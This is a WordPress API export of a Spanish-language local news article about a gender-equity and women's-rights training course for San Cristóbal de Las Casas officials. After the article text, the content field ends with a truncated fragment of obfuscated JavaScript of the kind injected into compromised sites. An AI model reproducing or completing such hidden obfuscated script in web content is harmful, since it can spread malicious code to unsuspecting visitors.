{"id":1207,"date":"2022-04-09T03:51:50","date_gmt":"2022-04-09T03:51:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1207"},"modified":"2022-04-09T03:51:51","modified_gmt":"2022-04-09T03:51:51","slug":"se-funcionarios-publicos-en-equidad-de-genero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1207","title":{"rendered":"Se  funcionarios p\u00fablicos en equidad de g\u00e9nero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-08-at-4.30.28-PM-1-1024x683.jpeg\" alt=\"\" class=\"wp-image-1208\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-08-at-4.30.28-PM-1-1024x683.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-08-at-4.30.28-PM-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-08-at-4.30.28-PM-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-08-at-4.30.28-PM-1.jpeg 1392w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Bella Rosa Guill\u00e9n Alfonzo, Directora de Equidad de G\u00e9nero y Desarrollo de las Mujeres, dio a conocer<\/p>\n\n\n\n<p>que funcionarios del Ayuntamiento de esta ciudad participaron en el curso de \u201cPromoci\u00f3n y Protecci\u00f3n de los Derechos Humanos de las Mujeres\u201d, con lo que se da cumplimiento a uno de los resolutivos que son medidas de prevenci\u00f3n, que es dar capacitaciones a los servidores p\u00fablicos del Ayuntamiento.<\/p>\n\n\n\n<p>\u201cEllos deben de tener la sensibilizaci\u00f3n y la capacidad de conocer y defender los derechos de las mujeres. Sabemos que los derechos humanos son inherentes a todo, pero al momento de aplicar el principio de universalidad se pierde este principio, es por eso que existen los derechos de las mujeres, es por eso que se luchan y se hace hincapi\u00e9 en el tema\u201d.<\/p>\n\n\n\n<p>Asimismo, mencion\u00f3 que esta capacitaci\u00f3n es en coordinaci\u00f3n con el ICATECH, ya que San Crist\u00f3bal ocupa uno de los primeros lugares en violencia de g\u00e9nero contra las mujeres y tenemos una declaratoria de alerta; &#8220;este tipo de talleres, no solo es para directores, en d\u00edas consecutivos tenemos para bares y cantinas, hoteleros y restauranteros\u201d.<\/p>\n\n\n\n<p>Por su parte, Sergio Luis Morales Hern\u00e1ndez, asesor de la Direcci\u00f3n de Equidad de G\u00e9nero y Desarrollo de las Mujeres, mencion\u00f3 que es un proyecto de capacitaci\u00f3n amplio como lo mandata la Alerta de Violencia de G\u00e9nero decretada en noviembre de 2018, con la finalidad de establecer las estrategias colaborativas tanto con otras instituciones como con el mismo Ayuntamiento, justamente para responder a esta alerta de violencia de g\u00e9nero.<\/p>\n\n\n\n<p>Precis\u00f3 que se est\u00e1n tratando temas b\u00e1sicos en violencia: \u201cviolencia de g\u00e9nero, tipos de violencia, modalidades, las nuevas violencias que est\u00e1n apareciendo como nuevas terminolog\u00edas; as\u00ed tambi\u00e9n, estamos capacit\u00e1ndolas en alerta de violencia de g\u00e9nero municipal, cu\u00e1ndo se decret\u00f3, cu\u00e1l es la historia de la alerta, qu\u00e9 nos mandata la alerta, de d\u00f3nde viene la alerta, as\u00ed como instrumentos internacionales de la defensor\u00eda de los derechos de las mujeres\u201d, abund\u00f3.<\/p>\n\n\n\n<p>\u201cTambi\u00e9n hay un apartado de movilidad con perspectiva de g\u00e9nero, justamente porque dentro de estad\u00edsticas internacionales, la CEPAL, nos comenta que las mujeres tienen mayor movilidad, es decir, que las mujeres salen m\u00e1s a la calle y tienen mayor movilidad que los hombres, dentro de las estad\u00edsticas tienen un 4.7 % de movilidad de los hombres contra un 9.4 de las mujeres. Tambi\u00e9n estamos viendo otro tema que ser\u00eda acoso callejero y hostigamiento sexual, que tambi\u00e9n tiene mucho que ver con la movilidad de las mujeres y cerramos el ciclo con masculinidades\u201d, enfatiz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Bella Rosa Guill\u00e9n Alfonzo, Directora de Equidad de G\u00e9nero y Desarrollo de las Mujeres, dio a conocer que funcionarios del Ayuntamiento de esta ciudad participaron en el curso de \u201cPromoci\u00f3n y Protecci\u00f3n de los Derechos Humanos de las Mujeres\u201d, con lo que se da cumplimiento a uno de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1208,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1207","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1207","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1207"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1207\/revisions"}],"predecessor-version":[{"id":1209,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1207\/revisions\/1209"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1208"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}